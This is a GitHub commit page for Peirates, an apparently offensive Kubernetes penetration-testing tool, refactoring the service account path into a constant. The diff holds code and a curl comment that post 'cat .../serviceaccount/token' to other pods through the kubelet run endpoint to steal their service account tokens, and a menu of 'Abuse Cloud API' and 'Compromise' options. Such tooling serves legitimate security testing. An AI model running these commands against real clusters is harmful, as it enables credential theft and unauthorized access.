Skip to content

Commit

Permalink
Set service account path to a const.
Browse files Browse the repository at this point in the history
  • Loading branch information
@JayBeale
JayBeale committed Aug 13, 2020
1 parent de0c151 commit 2ea78bb
Show file tree
Hide file tree
Showing 2 changed files with 7 additions and 6 deletions.
9 changes: 6 additions & 3 deletions config.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -8,6 +8,8 @@ import (
"os"
)

const ServiceAccountPath = "/var/run/secrets/kubernetes.io/serviceaccount/"

type ServerInfo struct {
RIPAddress string
RPort string
Expand All @@ -27,7 +29,8 @@ func ParseLocalServerInfo() ServerInfo {
configInfoVars.RPort = os.Getenv("KUBERNETES_SERVICE_PORT")

// Reading token file and storing in variable token
token, errRead := ioutil.ReadFile("/run/secrets/kubernetes.io/serviceaccount/token")
const tokenFile = ServiceAccountPath + "token"
token, errRead := ioutil.ReadFile(tokenFile)
configInfoVars.Token = string(token)

//Error message If statement based on failure to read the file
Expand All @@ -36,7 +39,7 @@ func ParseLocalServerInfo() ServerInfo {
}

// Reading namespace file and storing in variable namespace
namespace, errRead := ioutil.ReadFile("/run/secrets/kubernetes.io/serviceaccount/namespace")
namespace, errRead := ioutil.ReadFile(ServiceAccountPath + "namespace")
if errRead != nil {
fmt.Println("Namespaces location error", errRead)
}
Expand All @@ -46,7 +49,7 @@ func ParseLocalServerInfo() ServerInfo {
configInfoVars.TokenName = "Pod ns:" + configInfoVars.Namespace + ":" + os.Getenv("HOSTNAME")

//Reading Ca.Crt File and storing in variable caCrt
configInfoVars.CAPath = "/run/secrets/kubernetes.io/serviceaccount/ca.crt"
configInfoVars.CAPath = ServiceAccountPath + "ca.crt"

return configInfoVars
}
4 changes: 1 addition & 3 deletions peirates.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -885,8 +885,7 @@ func ExecuteCodeOnKubelet(connectionString ServerInfo, ServiceAccounts *[]Servic
// curl -sk https://10.23.58.41:10250/run/" + podNamespace + "/" + podName + "/" + containerName + "/ -d \"cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token\""

data := url.Values{}
data.Set("cmd", "cat /var/run/secrets/kubernetes.io/serviceaccount/token")
// data.Set("cmd", "hostname")
data.Set("cmd", "cat "+ServiceAccountPath+"token")

urlExecPod := "https://" + addr.Address + ":10250/run/" + podNamespace + "/" + podName + "/" + containerName + "/"

Expand Down Expand Up @@ -983,7 +982,6 @@ Interrogate/Abuse Cloud API's |
--------------------------------+
[17] List AWS S3 Buckets accessible (Auto-Refreshing Metadata API credentials) [aws-s3-ls]
[18] List contents of an AWS S3 Bucket (Auto-Refreshing Metadata API credentials) [aws-s3-ls-objects]
-----------+
Compromise |
-----------+
Expand Down

0 comments on commit 2ea78bb

Please sign in to comment.